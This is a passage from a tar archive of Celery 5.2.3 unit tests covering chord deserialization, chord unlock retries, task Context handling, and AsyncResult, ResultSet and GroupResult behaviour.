self.add.s(1, 2) original_chord = chord(header=header, body=body) rebuilt_chord = chord.from_dict(dict(original_chord)) assert isinstance(rebuilt_chord, chord) def test_from_dict_deep_deserialize(self, subtests): header = body = self.add.s(1, 2) original_chord = chord(header=header, body=body) serialized_chord = json.loads(json.dumps(original_chord)) deserialized_chord = chord.from_dict(serialized_chord) with subtests.test(msg="Verify chord is deserialized"): assert isinstance(deserialized_chord, chord) with subtests.test(msg="Validate chord header tasks is deserialized"): assert all( isinstance(child_task, Signature) for child_task in deserialized_chord.tasks ) with subtests.test(msg="Verify chord body is deserialized"): assert isinstance(deserialized_chord.body, Signature) def test_from_dict_deep_deserialize_group(self, subtests): header = body = group([self.add.s(1, 2)] * 42) original_chord = chord(header=header, body=body) serialized_chord = json.loads(json.dumps(original_chord)) deserialized_chord = chord.from_dict(serialized_chord) with subtests.test(msg="Verify chord is deserialized"): assert isinstance(deserialized_chord, chord) # A header which is a group gets unpacked into the chord's `tasks` with subtests.test( msg="Validate chord header tasks are deserialized and unpacked" ): assert all( isinstance(child_task, Signature) and not isinstance(child_task, group) for child_task in deserialized_chord.tasks ) # A body which is a group remains as it we passed in with subtests.test( msg="Validate chord body is deserialized and not unpacked" ): assert isinstance(deserialized_chord.body, group) assert all( isinstance(body_child_task, Signature) for body_child_task in deserialized_chord.body.tasks ) def test_from_dict_deeper_deserialize_group(self, subtests): inner_group = group([self.add.s(1, 2)] * 42) header = body = group([inner_group] * 42) original_chord = chord(header=header, body=body) serialized_chord = json.loads(json.dumps(original_chord)) deserialized_chord = chord.from_dict(serialized_chord) with subtests.test(msg="Verify chord is deserialized"): assert isinstance(deserialized_chord, chord) # A header which is a group gets unpacked into the chord's `tasks` with subtests.test( msg="Validate chord header tasks are deserialized and unpacked" ): assert all( isinstance(child_task, group) for child_task in deserialized_chord.tasks ) assert all( isinstance(grandchild_task, Signature) for child_task in deserialized_chord.tasks for grandchild_task in child_task.tasks ) # A body which is a group remains as it we passed in with subtests.test( msg="Validate chord body is deserialized and not unpacked" ): assert isinstance(deserialized_chord.body, group) assert all( isinstance(body_child_task, group) for body_child_task in deserialized_chord.body.tasks ) assert all( isinstance(body_grandchild_task, Signature) for body_child_task in deserialized_chord.body.tasks for body_grandchild_task in body_child_task.tasks ) def test_from_dict_deep_deserialize_chain(self, subtests): header = body = chain([self.add.s(1, 2)] * 42) original_chord = chord(header=header, body=body) serialized_chord = json.loads(json.dumps(original_chord)) deserialized_chord = chord.from_dict(serialized_chord) with subtests.test(msg="Verify chord is deserialized"): assert isinstance(deserialized_chord, chord) # A header which is a chain gets unpacked into the chord's `tasks` with subtests.test( msg="Validate chord header tasks are deserialized and unpacked" ): assert all( isinstance(child_task, Signature) and not isinstance(child_task, chain) for child_task in deserialized_chord.tasks ) # A body which is a chain gets mutatated into the hidden `_chain` class with subtests.test( msg="Validate chord body is deserialized and not unpacked" ): assert isinstance(deserialized_chord.body, _chain) class test_maybe_signature(CanvasCase): def test_is_None(self): assert maybe_signature(None, app=self.app) is None def test_is_dict(self): assert isinstance(maybe_signature(dict(self.add.s()), app=self.app), Signature) def test_when_sig(self): s = self.add.s() assert maybe_signature(s, app=self.app) is s ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/tasks/test_chord.py0000664000175000017500000002724300000000000017764 0ustar00asifasif00000000000000from contextlib import contextmanager from unittest.mock import Mock, PropertyMock, patch, sentinel import pytest from celery import canvas, group, result, uuid from celery.exceptions import ChordError, Retry from celery.result import AsyncResult, EagerResult, GroupResult def passthru(x): return x class ChordCase: def setup(self): @self.app.task(shared=False) def add(x, y): return x + y self.add = add class TSR(GroupResult): is_ready = True value = None def ready(self): return self.is_ready def join(self, propagate=True, **kwargs): if propagate: for value in self.value: if isinstance(value, Exception): raise value return self.value join_native = join def _failed_join_report(self): for value in self.value: if isinstance(value, Exception): yield EagerResult('some_id', value, 'FAILURE') class TSRNoReport(TSR): def _failed_join_report(self): return iter([]) @contextmanager def patch_unlock_retry(app): unlock = app.tasks['celery.chord_unlock'] retry = Mock() retry.return_value = Retry() prev, unlock.retry = unlock.retry, retry try: yield unlock, retry finally: unlock.retry = prev class test_unlock_chord_task(ChordCase): def test_unlock_ready(self): class AlwaysReady(TSR): is_ready = True value = [2, 4, 8, 6] with self._chord_context(AlwaysReady) as (cb, retry, _): cb.type.apply_async.assert_called_with( ([2, 4, 8, 6],), {}, task_id=cb.id, ) # didn't retry assert not retry.call_count def test_deps_ready_fails(self): GroupResult = Mock(name='GroupResult') GroupResult.return_value.ready.side_effect = KeyError('foo') unlock_chord = self.app.tasks['celery.chord_unlock'] with pytest.raises(KeyError): unlock_chord('groupid', Mock(), result=[Mock()], GroupResult=GroupResult, result_from_tuple=Mock()) def test_callback_fails(self): class AlwaysReady(TSR): is_ready = True value = [2, 4, 8, 6] def setup(callback): callback.apply_async.side_effect = IOError() with self._chord_context(AlwaysReady, setup) as (cb, retry, fail): fail.assert_called() assert fail.call_args[0][0] == cb.id assert isinstance(fail.call_args[1]['exc'], ChordError) def test_unlock_ready_failed(self): class Failed(TSR): is_ready = True value = [2, KeyError('foo'), 8, 6] with self._chord_context(Failed) as (cb, retry, fail_current): cb.type.apply_async.assert_not_called() # didn't retry assert not retry.call_count fail_current.assert_called() assert fail_current.call_args[0][0] == cb.id assert isinstance(fail_current.call_args[1]['exc'], ChordError) assert 'some_id' in str(fail_current.call_args[1]['exc']) def test_unlock_ready_failed_no_culprit(self): class Failed(TSRNoReport): is_ready = True value = [2, KeyError('foo'), 8, 6] with self._chord_context(Failed) as (cb, retry, fail_current): fail_current.assert_called() assert fail_current.call_args[0][0] == cb.id assert isinstance(fail_current.call_args[1]['exc'], ChordError) @contextmanager def _chord_context(self, ResultCls, setup=None, **kwargs): @self.app.task(shared=False) def callback(*args, **kwargs): pass self.app.finalize() pts, result.GroupResult = result.GroupResult, ResultCls callback.apply_async = Mock() callback_s = callback.s() callback_s.id = 'callback_id' fail_current = self.app.backend.fail_from_current_stack = Mock() try: with patch_unlock_retry(self.app) as (unlock, retry): signature, canvas.maybe_signature = ( canvas.maybe_signature, passthru, ) if setup: setup(callback) try: assert self.app.tasks['celery.chord_unlock'] is unlock try: unlock( 'group_id', callback_s, result=[ self.app.AsyncResult(r) for r in ['1', 2, 3] ], GroupResult=ResultCls, **kwargs ) except Retry: pass finally: canvas.maybe_signature = signature yield callback_s, retry, fail_current finally: result.GroupResult = pts def test_when_not_ready(self): class NeverReady(TSR): is_ready = False with self._chord_context(NeverReady, interval=10, max_retries=30) \ as (cb, retry, _): cb.type.apply_async.assert_not_called() # did retry retry.assert_called_with(countdown=10, max_retries=30) def test_when_not_ready_with_configured_chord_retry_interval(self): class NeverReady(TSR): is_ready = False self.app.conf.result_chord_retry_interval, prev = 42, self.app.conf.result_chord_retry_interval try: with self._chord_context(NeverReady, max_retries=30) as (cb, retry, _): cb.type.apply_async.assert_not_called() # did retry retry.assert_called_with(countdown=42, max_retries=30) finally: self.app.conf.result_chord_retry_interval = prev def test_is_in_registry(self): assert 'celery.chord_unlock' in self.app.tasks def _test_unlock_join_timeout(self, timeout): class MockJoinResult(TSR): is_ready = True value = [(None,)] join = Mock(return_value=value) join_native = join self.app.conf.result_chord_join_timeout = timeout with self._chord_context(MockJoinResult): MockJoinResult.join.assert_called_with( timeout=timeout, propagate=True, ) def test_unlock_join_timeout_default(self): self._test_unlock_join_timeout( timeout=self.app.conf.result_chord_join_timeout, ) def test_unlock_join_timeout_custom(self): self._test_unlock_join_timeout(timeout=5.0) def test_unlock_with_chord_params(self): @self.app.task(shared=False) def mul(x, y): return x * y from celery import chord ch = chord(group(mul.s(1, 1), mul.s(2, 2)), mul.s(), interval=10) with patch.object(ch, 'run') as run: ch.apply_async() run.assert_called_once_with(group(mul.s(1, 1), mul.s(2, 2)), mul.s(), (), task_id=None, interval=10) def test_unlock_with_chord_params_and_task_id(self): @self.app.task(shared=False) def mul(x, y): return x * y from celery import chord ch = chord(group(mul.s(1, 1), mul.s(2, 2)), mul.s(), interval=10) with patch.object(ch, 'run') as run: ch.apply_async(task_id=sentinel.task_id) run.assert_called_once_with( group(mul.s(1, 1), mul.s(2, 2)), mul.s(), (), task_id=sentinel.task_id, interval=10, ) class test_chord(ChordCase): def test_eager(self): from celery import chord @self.app.task(shared=False) def addX(x, y): return x + y @self.app.task(shared=False) def sumX(n): return sum(n) self.app.conf.task_always_eager = True x = chord(addX.s(i, i) for i in range(10)) body = sumX.s() result = x(body) assert result.get() == sum(i + i for i in range(10)) def test_apply(self): self.app.conf.task_always_eager = False from celery import chord m = Mock() m.app.conf.task_always_eager = False m.AsyncResult = AsyncResult prev, chord.run = chord.run, m try: x = chord(self.add.s(i, i) for i in range(10)) body = self.add.s(2) result = x(body) assert result.id # does not modify original signature with pytest.raises(KeyError): body.options['task_id'] chord.run.assert_called() finally: chord.run = prev def test_init(self): from celery import chord from celery.utils.serialization import pickle @self.app.task(shared=False) def addX(x, y): return x + y @self.app.task(shared=False) def sumX(n): return sum(n) x = chord(addX.s(i, i) for i in range(10)) # kwargs used to nest and recurse in serialization/deserialization # (#6810) assert x.kwargs['kwargs'] == {} assert pickle.loads(pickle.dumps(x)).kwargs == x.kwargs class test_add_to_chord: def setup(self): @self.app.task(shared=False) def add(x, y): return x + y self.add = add @self.app.task(shared=False, bind=True) def adds(self, sig, lazy=False): return self.add_to_chord(sig, lazy) self.adds = adds @patch('celery.Celery.backend', new=PropertyMock(name='backend')) def test_add_to_chord(self): sig = self.add.s(2, 2) sig.delay = Mock(name='sig.delay') self.adds.request.group = uuid() self.adds.request.id = uuid() with pytest.raises(ValueError): # task not part of chord self.adds.run(sig) self.adds.request.chord = self.add.s() res1 = self.adds.run(sig, True) assert res1 == sig assert sig.options['task_id'] assert sig.options['group_id'] == self.adds.request.group assert sig.options['chord'] == self.adds.request.chord sig.delay.assert_not_called() self.app.backend.add_to_chord.assert_called_with( self.adds.request.group, sig.freeze(), ) self.app.backend.reset_mock() sig2 = self.add.s(4, 4) sig2.delay = Mock(name='sig2.delay') res2 = self.adds.run(sig2) assert res2 == sig2.delay.return_value assert sig2.options['task_id'] assert sig2.options['group_id'] == self.adds.request.group assert sig2.options['chord'] == self.adds.request.chord sig2.delay.assert_called_with() self.app.backend.add_to_chord.assert_called_with( self.adds.request.group, sig2.freeze(), ) class test_Chord_task(ChordCase): @patch('celery.Celery.backend', new=PropertyMock(name='backend')) def test_run(self): self.app.backend.cleanup = Mock() self.app.backend.cleanup.__name__ = 'cleanup' Chord = self.app.tasks['celery.chord'] body = self.add.signature() Chord(group(self.add.signature((i, i)) for i in range(5)), body) Chord([self.add.signature((j, j)) for j in range(5)], body) assert self.app.backend.apply_chord.call_count == 2 @patch('celery.Celery.backend', new=PropertyMock(name='backend')) def test_run__chord_size_set(self): Chord = self.app.tasks['celery.chord'] body = self.add.signature() group_size = 4 group1 = group(self.add.signature((i, i)) for i in range(group_size)) result = Chord(group1, body) self.app.backend.set_chord_size.assert_called_once_with(result.parent.id, group_size) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/tasks/test_context.py0000664000175000017500000000443600000000000020350 0ustar00asifasif00000000000000from celery.app.task import Context # Retrieve the values of all context attributes as a # dictionary in an implementation-agnostic manner. def get_context_as_dict(ctx, getter=getattr): defaults = {} for attr_name in dir(ctx): if attr_name.startswith('_'): continue # Ignore pseudo-private attributes attr = getter(ctx, attr_name) if callable(attr): continue # Ignore methods and other non-trivial types defaults[attr_name] = attr return defaults default_context = get_context_as_dict(Context()) class test_Context: def test_default_context(self): # A bit of a tautological test, since it uses the same # initializer as the default_context constructor. defaults = dict(default_context, children=[]) assert get_context_as_dict(Context()) == defaults def test_updated_context(self): expected = dict(default_context) changes = {'id': 'unique id', 'args': ['some', 1], 'wibble': 'wobble'} ctx = Context() expected.update(changes) ctx.update(changes) assert get_context_as_dict(ctx) == expected assert get_context_as_dict(Context()) == default_context def test_modified_context(self): expected = dict(default_context) ctx = Context() expected['id'] = 'unique id' expected['args'] = ['some', 1] ctx.id = 'unique id' ctx.args = ['some', 1] assert get_context_as_dict(ctx) == expected assert get_context_as_dict(Context()) == default_context def test_cleared_context(self): changes = {'id': 'unique id', 'args': ['some', 1], 'wibble': 'wobble'} ctx = Context() ctx.update(changes) ctx.clear() defaults = dict(default_context, children=[]) assert get_context_as_dict(ctx) == defaults assert get_context_as_dict(Context()) == defaults def test_context_get(self): expected = dict(default_context) changes = {'id': 'unique id', 'args': ['some', 1], 'wibble': 'wobble'} ctx = Context() expected.update(changes) ctx.update(changes) ctx_dict = get_context_as_dict(ctx, getter=Context.get) assert ctx_dict == expected assert get_context_as_dict(Context()) == default_context ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/tasks/test_result.py0000664000175000017500000010427100000000000020200 0ustar00asifasif00000000000000import copy import datetime import traceback from contextlib import contextmanager from unittest.mock import Mock, call, patch import pytest from celery import states, uuid from celery.app.task import Context from celery.backends.base import SyncBackendMixin from celery.exceptions import (ImproperlyConfigured, IncompleteStream, TimeoutError) from celery.result import (AsyncResult, EagerResult, GroupResult, ResultSet, assert_will_not_block, result_from_tuple) from celery.utils.serialization import pickle PYTRACEBACK = """\ Traceback (most recent call last): File "foo.py", line 2, in foofunc don't matter File "bar.py", line 3, in barfunc don't matter Doesn't matter: really!\ """ def mock_task(name, state, result, traceback=None): return { 'id': uuid(), 'name': name, 'state': state, 'result': result, 'traceback': traceback, } def save_result(app, task): traceback = task.get('traceback') or 'Some traceback' if task['state'] == states.SUCCESS: app.backend.mark_as_done(task['id'], task['result']) elif task['state'] == states.RETRY: app.backend.mark_as_retry( task['id'], task['result'], traceback=traceback, ) else: app.backend.mark_as_failure( task['id'], task['result'], traceback=traceback, ) def make_mock_group(app, size=10): tasks = [mock_task('ts%d' % i, states.SUCCESS, i) for i in range(size)] [save_result(app, task) for task in tasks] return [app.AsyncResult(task['id']) for task in tasks] class _MockBackend: def add_pending_result(self, *args, **kwargs): return True def wait_for_pending(self, *args, **kwargs): return True def remove_pending_result(self, *args, **kwargs): return True class test_AsyncResult: def setup(self): self.app.conf.result_cache_max = 100 self.app.conf.result_serializer = 'pickle' self.app.conf.result_extended = True self.task1 = mock_task('task1', states.SUCCESS, 'the') self.task2 = mock_task('task2', states.SUCCESS, 'quick') self.task3 = mock_task('task3', states.FAILURE, KeyError('brown')) self.task4 = mock_task('task3', states.RETRY, KeyError('red')) self.task5 = mock_task( 'task3', states.FAILURE, KeyError('blue'), PYTRACEBACK, ) self.task6 = mock_task('task6', states.SUCCESS, None) for task in (self.task1, self.task2, self.task3, self.task4, self.task5, self.task6): save_result(self.app, task) @self.app.task(shared=False) def mytask(): pass self.mytask = mytask def test_forget(self): first = Mock() second = self.app.AsyncResult(self.task1['id'], parent=first) third = self.app.AsyncResult(self.task2['id'], parent=second) last = self.app.AsyncResult(self.task3['id'], parent=third) last.forget() first.forget.assert_called_once() assert last.result is None assert second.result is None def test_ignored_getter(self): result = self.app.AsyncResult(uuid()) assert result.ignored is False result.__delattr__('_ignored') assert result.ignored is False @patch('celery.result.task_join_will_block') def test_assert_will_not_block(self, task_join_will_block): task_join_will_block.return_value = True with pytest.raises(RuntimeError): assert_will_not_block() task_join_will_block.return_value = False assert_will_not_block() @patch('celery.result.task_join_will_block') def test_get_sync_subtask_option(self, task_join_will_block): task_join_will_block.return_value = True tid = uuid() backend = _MockBackend() res_subtask_async = AsyncResult(tid, backend=backend) with pytest.raises(RuntimeError): res_subtask_async.get() res_subtask_async.get(disable_sync_subtasks=False) def test_without_id(self): with pytest.raises(ValueError): AsyncResult(None, app=self.app) def test_compat_properties(self): x = self.app.AsyncResult('1') assert x.task_id == x.id x.task_id = '2' assert x.id == '2' @pytest.mark.usefixtures('depends_on_current_app') def test_reduce_direct(self): x = AsyncResult('1', app=self.app) fun, args = x.__reduce__() assert fun(*args) == x def test_children(self): x = self.app.AsyncResult('1') children = [EagerResult(str(i), i, states.SUCCESS) for i in range(3)] x._cache = {'children': children, 'status': states.SUCCESS} x.backend = Mock() assert x.children assert len(x.children) == 3 def test_propagates_for_parent(self): x = self.app.AsyncResult(uuid()) x.backend = Mock(name='backend') x.backend.get_task_meta.return_value = {} x.backend.wait_for_pending.return_value = 84 x.parent = EagerResult(uuid(), KeyError('foo'), states.FAILURE) with pytest.raises(KeyError): x.get(propagate=True) x.backend.wait_for_pending.assert_not_called() x.parent = EagerResult(uuid(), 42, states.SUCCESS) assert x.get(propagate=True) == 84 x.backend.wait_for_pending.assert_called() def test_get_children(self): tid = uuid() x = self.app.AsyncResult(tid) child = [self.app.AsyncResult(uuid()).as_tuple() for i in range(10)] x._cache = {'children': child} assert x.children assert len(x.children) == 10 x._cache = {'status': states.SUCCESS} x.backend._cache[tid] = {'result': None} assert x.children is None def test_build_graph_get_leaf_collect(self): x = self.app.AsyncResult('1') x.backend._cache['1'] = {'status': states.SUCCESS, 'result': None} c = [EagerResult(str(i), i, states.SUCCESS) for i in range(3)] x.iterdeps = Mock() x.iterdeps.return_value = ( (None, x), (x, c[0]), (c[0], c[1]), (c[1], c[2]) ) x.backend.READY_STATES = states.READY_STATES assert x.graph assert x.get_leaf() == 2 it = x.collect() assert list(it) == [ (x, None), (c[0], 0), (c[1], 1), (c[2], 2), ] def test_iterdeps(self): x = self.app.AsyncResult('1') c = [EagerResult(str(i), i, states.SUCCESS) for i in range(3)] x._cache = {'status': states.SUCCESS, 'result': None, 'children': c} for child in c: child.backend = Mock() child.backend.get_children.return_value = [] it = x.iterdeps() assert list(it) == [ (None, x), (x, c[0]), (x, c[1]), (x, c[2]), ] x._cache = None x.ready = Mock() x.ready.return_value = False with pytest.raises(IncompleteStream): list(x.iterdeps()) list(x.iterdeps(intermediate=True)) def test_eq_not_implemented(self): assert self.app.AsyncResult('1') != object() @pytest.mark.usefixtures('depends_on_current_app') def test_reduce(self): a1 = self.app.AsyncResult('uuid') restored = pickle.loads(pickle.dumps(a1)) assert restored.id == 'uuid' a2 = self.app.AsyncResult('uuid') assert pickle.loads(pickle.dumps(a2)).id == 'uuid' def test_maybe_set_cache_empty(self): self.app.AsyncResult('uuid')._maybe_set_cache(None) def test_set_cache__children(self): r1 = self.app.AsyncResult('id1') r2 = self.app.AsyncResult('id2') r1._set_cache({'children': [r2.as_tuple()]}) assert r2 in r1.children def test_successful(self): ok_res = self.app.AsyncResult(self.task1['id']) nok_res = self.app.AsyncResult(self.task3['id']) nok_res2 = self.app.AsyncResult(self.task4['id']) assert ok_res.successful() assert not nok_res.successful() assert not nok_res2.successful() pending_res = self.app.AsyncResult(uuid()) assert not pending_res.successful() def test_raising(self): notb = self.app.AsyncResult(self.task3['id']) withtb = self.app.AsyncResult(self.task5['id']) with pytest.raises(KeyError): notb.get() with pytest.raises(KeyError) as excinfo: withtb.get() tb = [t.strip() for t in traceback.format_tb(excinfo.tb)] assert 'File "foo.py", line 2, in foofunc' not in tb assert 'File "bar.py", line 3, in barfunc' not in tb assert excinfo.value.args[0] == 'blue' assert excinfo.typename == 'KeyError' def test_raising_remote_tracebacks(self): pytest.importorskip('tblib') withtb = self.app.AsyncResult(self.task5['id']) self.app.conf.task_remote_tracebacks = True with pytest.raises(KeyError) as excinfo: withtb.get() tb = [t.strip() for t in traceback.format_tb(excinfo.tb)] assert 'File "foo.py", line 2, in foofunc' in tb assert 'File "bar.py", line 3, in barfunc' in tb assert excinfo.value.args[0] == 'blue' assert excinfo.typename == 'KeyError' def test_str(self): ok_res = self.app.AsyncResult(self.task1['id']) ok2_res = self.app.AsyncResult(self.task2['id']) nok_res = self.app.AsyncResult(self.task3['id']) assert str(ok_res) == self.task1['id'] assert str(ok2_res) == self.task2['id'] assert str(nok_res) == self.task3['id'] pending_id = uuid() pending_res = self.app.AsyncResult(pending_id) assert str(pending_res) == pending_id def test_repr(self): ok_res = self.app.AsyncResult(self.task1['id']) ok2_res = self.app.AsyncResult(self.task2['id']) nok_res = self.app.AsyncResult(self.task3['id']) assert repr(ok_res) == f"" assert repr(ok2_res) == f"" assert repr(nok_res) == f"" pending_id = uuid() pending_res = self.app.AsyncResult(pending_id) assert repr(pending_res) == f'' def test_hash(self): assert (hash(self.app.AsyncResult('x0w991')) == hash(self.app.AsyncResult('x0w991'))) assert (hash(self.app.AsyncResult('x0w991')) != hash(self.app.AsyncResult('x1w991'))) def test_get_traceback(self): ok_res = self.app.AsyncResult(self.task1['id']) nok_res = self.app.AsyncResult(self.task3['id']) nok_res2 = self.app.AsyncResult(self.task4['id']) assert not ok_res.traceback assert nok_res.traceback assert nok_res2.traceback pending_res = self.app.AsyncResult(uuid()) assert not pending_res.traceback def test_get__backend_gives_None(self): res = self.app.AsyncResult(self.task1['id']) res.backend.wait_for = Mock(name='wait_for') res.backend.wait_for.return_value = None assert res.get() is None def test_get(self): ok_res = self.app.AsyncResult(self.task1['id']) ok2_res = self.app.AsyncResult(self.task2['id']) nok_res = self.app.AsyncResult(self.task3['id']) nok2_res = self.app.AsyncResult(self.task4['id']) none_res = self.app.AsyncResult(self.task6['id']) callback = Mock(name='callback') assert ok_res.get(callback=callback) == 'the' callback.assert_called_with(ok_res.id, 'the') assert ok2_res.get() == 'quick' with pytest.raises(KeyError): nok_res.get() assert nok_res.get(propagate=False) assert isinstance(nok2_res.result, KeyError) assert ok_res.info == 'the' assert none_res.get() is None assert none_res.state == states.SUCCESS def test_get_when_ignored(self): result = self.app.AsyncResult(uuid()) result.ignored = True # Does not block assert result.get() is None def test_eq_ne(self): r1 = self.app.AsyncResult(self.task1['id']) r2 = self.app.AsyncResult(self.task1['id']) r3 = self.app.AsyncResult(self.task2['id']) assert r1 == r2 assert r1 != r3 assert r1 == r2.id assert r1 != r3.id @pytest.mark.usefixtures('depends_on_current_app') def test_reduce_restore(self): r1 = self.app.AsyncResult(self.task1['id']) fun, args = r1.__reduce__() assert fun(*args) == r1 def test_get_timeout(self): res = self.app.AsyncResult(self.task4['id']) # has RETRY state with pytest.raises(TimeoutError): res.get(timeout=0.001) pending_res = self.app.AsyncResult(uuid()) with patch('celery.result.time') as _time: with pytest.raises(TimeoutError): pending_res.get(timeout=0.001, interval=0.001) _time.sleep.assert_called_with(0.001) def test_get_timeout_longer(self): res = self.app.AsyncResult(self.task4['id']) # has RETRY state with patch('celery.result.time') as _time: with pytest.raises(TimeoutError): res.get(timeout=1, interval=1) _time.sleep.assert_called_with(1) def test_ready(self): oks = (self.app.AsyncResult(self.task1['id']), self.app.AsyncResult(self.task2['id']), self.app.AsyncResult(self.task3['id'])) assert all(result.ready() for result in oks) assert not self.app.AsyncResult(self.task4['id']).ready() assert not self.app.AsyncResult(uuid()).ready() def test_del(self): with patch('celery.result.AsyncResult.backend') as backend: result = self.app.AsyncResult(self.task1['id']) result_clone = copy.copy(result) del result assert backend.remove_pending_result.called_once_with( result_clone ) result = self.app.AsyncResult(self.task1['id']) result.backend = None del result def test_get_request_meta(self): x = self.app.AsyncResult('1') request = Context( task='foo', children=None, args=['one', 'two'], kwargs={'kwarg1': 'three'}, hostname="foo", retries=1, delivery_info={'routing_key': 'celery'} ) x.backend.store_result(task_id="1", result='foo', state=states.SUCCESS, traceback=None, request=request) assert x.name == 'foo' assert x.args == ['one', 'two'] assert x.kwargs == {'kwarg1': 'three'} assert x.worker == 'foo' assert x.retries == 1 assert x.queue == 'celery' assert isinstance(x.date_done, datetime.datetime) assert x.task_id == "1" assert x.state == "SUCCESS" result = self.app.AsyncResult(self.task4['id']) assert result.date_done is None @pytest.mark.parametrize('result_dict, date', [ ({'date_done': None}, None), ({'date_done': '1991-10-05T05:41:06'}, datetime.datetime(1991, 10, 5, 5, 41, 6)), ({'date_done': datetime.datetime(1991, 10, 5, 5, 41, 6)}, datetime.datetime(1991, 10, 5, 5, 41, 6)) ]) def test_date_done(self, result_dict, date): result = self.app.AsyncResult(uuid()) result._cache = result_dict assert result.date_done == date class test_ResultSet: def test_resultset_repr(self): assert repr(self.app.ResultSet( [self.app.AsyncResult(t) for t in ['1', '2', '3']])) def test_eq_other(self): assert self.app.ResultSet([ self.app.AsyncResult(t) for t in [1, 3, 3]]) != 1 rs1 = self.app.ResultSet([self.app.AsyncResult(1)]) rs2 = self.app.ResultSet([self.app.AsyncResult(1)]) assert rs1 == rs2 def test_get(self): x = self.app.ResultSet([self.app.AsyncResult(t) for t in [1, 2, 3]]) b = x.results[0].backend = Mock() b.supports_native_join = False x.join_native = Mock() x.join = Mock() x.get() x.join.assert_called() b.supports_native_join = True x.get() x.join_native.assert_called() @patch('celery.result.task_join_will_block') def test_get_sync_subtask_option(self, task_join_will_block): task_join_will_block.return_value = True x = self.app.ResultSet([self.app.AsyncResult(str(t)) for t in [1, 2, 3]]) b = x.results[0].backend = Mock() b.supports_native_join = False with pytest.raises(RuntimeError): x.get() with pytest.raises(TimeoutError): x.get(disable_sync_subtasks=False, timeout=0.1) def test_join_native_with_group_chain_group(self): """Test group(chain(group)) case, join_native can be run correctly. In group(chain(group)) case, GroupResult has no _cache property, and AsyncBackendMixin.iter_native returns a node instead of node._cache, this test make sure ResultSet.join_native can process correctly both values of AsyncBackendMixin.iter_native returns. """ def _get_meta(tid, result=None, children=None): return { 'status': states.SUCCESS, 'result': result, 'children': children, 'task_id': tid, } results = [self.app.AsyncResult(t) for t in [1, 2, 3]] values = [(_.id, _get_meta(_.id, _)) for _ in results] g_res = GroupResult(6, [self.app.AsyncResult(t) for t in [4, 5]]) results += [g_res] values += [(6, g_res.children)] x = self.app.ResultSet(results) x.results[0].backend = Mock() x.results[0].backend.join = Mock() x.results[3][0].get = Mock() x.results[3][0].get.return_value = g_res.results[0] x.results[3][1].get = Mock() x.results[3][1].get.return_value = g_res.results[1] x.iter_native = Mock() x.iter_native.return_value = values.__iter__() x.join_native() x.iter_native.assert_called() def test_eq_ne(self): g1 = self.app.ResultSet([ self.app.AsyncResult('id1'), self.app.AsyncResult('id2'), ]) g2 = self.app.ResultSet([ self.app.AsyncResult('id1'), self.app.AsyncResult('id2'), ]) g3 = self.app.ResultSet([ self.app.AsyncResult('id3'), self.app.AsyncResult('id1'), ]) assert g1 == g2 assert g1 != g3 assert g1 != object() def test_takes_app_from_first_task(self): x = ResultSet([self.app.AsyncResult('id1')]) assert x.app is x.results[0].app x.app = self.app assert x.app is self.app def test_get_empty(self): x = self.app.ResultSet([]) assert x.supports_native_join is None x.join = Mock(name='join') x.get() x.join.assert_called() def test_add(self): x = self.app.ResultSet([self.app.AsyncResult(1)]) x.add(self.app.AsyncResult(2)) assert len(x) == 2 x.add(self.app.AsyncResult(2)) assert len(x) == 2 @contextmanager def dummy_copy(self): with patch('celery.result.copy') as copy: def passt(arg): return arg copy.side_effect = passt yield def test_add_discard(self): x = self.app.ResultSet([]) x.add(self.app.AsyncResult('1')) assert self.app.AsyncResult('1') in x.results x.discard(self.app.AsyncResult('1')) x.discard(self.app.AsyncResult('1')) x.discard('1') assert self.app.AsyncResult('1') not in x.results x.update([self.app.AsyncResult('2')]) def test_clear(self): x = self.app.ResultSet([]) r = x.results x.clear() assert x.results is r class MockAsyncResultFailure(AsyncResult): @property def result(self): return KeyError('baz') @property def state(self): return states.FAILURE def get(self, propagate=True, **kwargs): if propagate: raise self.result return self.result class MockAsyncResultSuccess(AsyncResult): forgotten = False def __init__(self, *args, **kwargs): self._result = kwargs.pop('result', 42) super().__init__(*args, **kwargs) def forget(self): self.forgotten = True @property def result(self): return self._result @property def state(self): return states.SUCCESS def get(self, **kwargs): return self.result class SimpleBackend(SyncBackendMixin): ids = [] def __init__(self, ids=[]): self.ids = ids def _ensure_not_eager(self): pass def get_many(self, *args, **kwargs): return ((id, {'result': i, 'status': states.SUCCESS}) for i, id in enumerate(self.ids)) class test_GroupResult: def setup(self): self.size = 10 self.ts = self.app.GroupResult( uuid(), make_mock_group(self.app, self.size), ) @pytest.mark.usefixtures('depends_on_current_app') def test_is_pickleable(self): ts = self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())]) assert pickle.loads(pickle.dumps(ts)) == ts ts2 = self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())]) assert pickle.loads(pickle.dumps(ts2)) == ts2 @pytest.mark.usefixtures('depends_on_current_app') def test_reduce(self): ts = self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())]) fun, args = ts.__reduce__() ts2 = fun(*args) assert ts2.id == ts.id assert ts == ts2 def test_eq_ne(self): ts = self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())]) ts2 = self.app.GroupResult(ts.id, ts.results) ts3 = self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())]) ts4 = self.app.GroupResult(ts.id, [self.app.AsyncResult(uuid())]) assert ts == ts2 assert ts != ts3 assert ts != ts4 assert ts != object() def test_len(self): assert len(self.ts) == self.size def test_eq_other(self): assert self.ts != 1 def test_eq_with_parent(self): # GroupResult instances with different .parent are not equal grp_res = self.app.GroupResult( uuid(), [self.app.AsyncResult(uuid()) for _ in range(10)], parent=self.app.AsyncResult(uuid()) ) grp_res_2 = self.app.GroupResult(grp_res.id, grp_res.results) assert grp_res != grp_res_2 grp_res_2.parent = self.app.AsyncResult(uuid()) assert grp_res != grp_res_2 grp_res_2.parent = grp_res.parent assert grp_res == grp_res_2 @pytest.mark.usefixtures('depends_on_current_app') def test_pickleable(self): assert pickle.loads(pickle.dumps(self.ts)) def test_forget(self): subs = [MockAsyncResultSuccess(uuid(), app=self.app), MockAsyncResultSuccess(uuid(), app=self.app)] ts = self.app.GroupResult(uuid(), subs) ts.forget() for sub in subs: assert sub.forgotten def 